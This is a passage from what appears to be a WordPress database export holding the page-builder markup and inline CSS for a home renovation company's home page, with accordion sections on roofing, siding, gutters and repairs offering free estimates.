10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-1e53268c .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-1e53268c .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"40ca82c9\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-40ca82c9 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"a081008d\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-a081008d gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c015ecde\",\"title\":\"Gutters\",\"content\":\"As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c015ecde gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Gutters</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"8f9f148e\",\"title\":\"Repairs\",\"content\":\"We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-8f9f148e gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Repairs</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"e968bd23-7521-4da1-a172-0c209a166104\"} -->\n<style type=\"text/css\"> .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e968bd23-7521-4da1-a172-0c209a166104 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e968bd23-7521-4da1-a172-0c209a166104\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','publish','closed','closed','','home','','','2022-08-25 00:20:16','2022-08-25 00:20:16','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=7',0,'page','',0),(501,1,'2022-08-25 00:20:16','2022-08-25 00:20:16','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6572cb3a-e562-4038-ad61-6f87d52a0653\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-6572cb3a-e562-4038-ad61-6f87d52a0653 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4aa597f7-bf32-48a4-a97d-ab721c46fd1f\"} -->\n<style type=\"text/css\"> .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e47140c0-e0cf-490c-8e07-8547639ead1a\"} -->\n<style type=\"text/css\"> .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e47140c0-e0cf-490c-8e07-8547639ead1a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"c574290d-0b76-4326-958f-c0f3a4df2f20\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-c574290d-0b76-4326-958f-c0f3a4df2f20 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a0cc88e5-b846-45db-9d00-0bc679273fb7\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a0cc88e5-b846-45db-9d00-0bc679273fb7\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"ff268419-3a77-4274-b411-46ce7ae7d0da\"} -->\n<style type=\"text/css\"> .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ff268419-3a77-4274-b411-46ce7ae7d0da\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"819d03eb-ca79-4f68-a4a6-6e4c3c07bc39\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n 